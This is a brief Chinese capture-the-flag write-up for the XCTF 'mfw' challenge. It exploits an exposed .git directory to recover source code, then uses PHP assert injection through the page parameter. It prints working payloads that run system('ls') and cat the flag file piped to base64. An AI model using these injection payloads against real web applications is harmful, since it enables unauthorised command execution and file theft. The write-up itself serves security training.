XCTF-mfw

mfw

mfw是什么东西？？？

看题：

进来只有几个标签，挨着点一遍，到About页面

看到了Git，猜测有git泄露，访问/.git/HEAD成功

上Githack，但是会一直重复

按了一次ctrl+c就好了

有没有哪位大哥知道这是什么问题

然后用git log 和 git diff试了一下，什么都没有，只好去看看代码

看到index.php的时候

发现assert里面的$file是可控的，所以可以进行命令注入

尝试?page=flag.php','..')==false and system('ls') and strpos('templates/flag

有回显，这里重复两次是因为红框下面还有一句assert

尝试爆flag?page=flag.php','..')==false and system('cat templates/flag.php') and strpos('templates/flag

！！！竟然没显示，然后试了好多都不行，最后想到返回php文件会因为特殊符号而报错，所以使用base64

payload：flag.php','..')==false and system('cat templates/flag.php | base64') and strpos('templates/flag